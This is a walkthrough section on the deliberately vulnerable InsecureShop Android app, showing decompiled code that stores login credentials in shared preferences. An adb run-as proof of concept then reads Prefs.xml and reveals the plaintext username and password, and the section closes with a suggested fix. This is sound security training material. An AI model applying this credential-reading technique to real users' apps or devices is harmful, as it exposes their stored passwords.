πVulnerability #3: Insecure Data Storage
If we go back to com.insecureshop.LoginActivity and analyze the code that follows after we successfully login (check lines 44-70), we see that the following code saves the username and password values into the appβs shared preferences.
Prefs prefs = Prefs.INSTANCE;
Context applicationContext = getApplicationContext();
Intrinsics.checkExpressionValueIsNotNull(applicationContext, "applicationContext");
prefs.getInstance(applicationContext).setUsername(username);
Prefs prefs2 = Prefs.INSTANCE;
Context applicationContext2 = getApplicationContext();
Intrinsics.checkExpressionValueIsNotNull(applicationContext2, "applicationContext");
prefs2.getInstance(applicationContext2).setPassword(password);
Util.saveProductList$default(Util.INSTANCE, this, null, 2, null);
startActivity(new Intent(this, ProductListActivity.class));
return;
proof-of-concept: since the app is debuggable, we can run-as the application in order to view the contents of its internal storage:
C:\Users\Aniket\Downloads\InsecureShop>adb shell
2026:/ $ run-as com.insecureshop
2026:/data/user/0/com.insecureshop $ ls -la
total 72
drwx------ 7 u0_a478 u0_a478 4096 2022-04-06 10:38 .
drwxrwx--x 357 system system 20480 2022-04-06 10:23 ..
drwxrwx--x 2 u0_a478 u0_a478 4096 2022-04-06 10:38 app_textures
drwx------ 3 u0_a478 u0_a478 4096 2022-04-06 10:38 app_webview
drwxrws--x 4 u0_a478 u0_a478_cache 4096 2022-04-06 10:38 cache
drwxrws--x 2 u0_a478 u0_a478_cache 4096 2022-04-06 10:22 code_cache
drwxrwx--x 2 u0_a478 u0_a478 4096 2022-04-06 10:38 shared_prefs
2026:/data/user/0/com.insecureshop $ cd shared_prefs/
2026:/data/user/0/com.insecureshop/shared_prefs $ ls
Prefs.xml WebViewChromiumPrefs.xml
2026:/data/user/0/com.insecureshop/shared_prefs $ cat Prefs.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="password">!ns3csh0p</string>
<string name="productList">[{"id":1,"imageUrl":"https://images.pexels.com/photos/7974/pexels-photo.jpg","name":"Laptop","price":"80","qty":0,"rating":1,"url":"https://www.insecureshopapp.com"},{"id":2,"imageUrl":"https://images.pexels.com/photos/984619/pexels-photo-984619.jpeg","name":"Hat","price":"10","qty":0,"rating":2,"url":"https://www.insecureshopapp.com"},{"id":3,"imageUrl":"https://images.pexels.com/photos/343720/pexels-photo-343720.jpeg","name":"Sunglasses","price":"10","qty":0,"rating":4,"url":"https://www.insecureshopapp.com"},{"id":4,"imageUrl":"https://images.pexels.com/photos/277390/pexels-photo-277390.jpeg","name":"Watch","price":"30","qty":0,"rating":4,"url":"https://www.insecureshopapp.com"},{"id":5,"imageUrl":"https://images.pexels.com/photos/225157/pexels-photo-225157.jpeg","name":"Camera","price":"40","qty":0,"rating":2,"url":"https://www.insecureshopapp.com"},{"id":6,"imageUrl":"https://images.pexels.com/photos/264819/pexels-photo-264819.jpeg","name":"Perfumes","price":"10","qty":0,"rating":2,"url":"https://www.insecureshopapp.com"},{"id":7,"imageUrl":"https://images.pexels.com/photos/532803/pexels-photo-532803.jpeg","name":"Bagpack","price":"20","qty":0,"rating":2,"url":"https://www.insecureshopapp.com"},{"id":8,"imageUrl":"https://images.pexels.com/photos/789812/pexels-photo-789812.jpeg","name":"Jacket","price":"20","qty":0,"rating":2,"url":"https://www.insecureshopapp.com"}]</string>
<string name="username">shopuser</string>
</map>
2026:/data/user/0/com.insecureshop/shared_prefs $If youβre using a rooted android device, you can just directly navigate to the appβs internal storage directory without executing the
run-ascommand. The vulnerability could be avoided by simply trying to encrypt the data before saving.
PreviousVulnerability #2: Hardcoded CredentialsNextVulnerability #4: Lack of SSL Certificate Validation
Last updated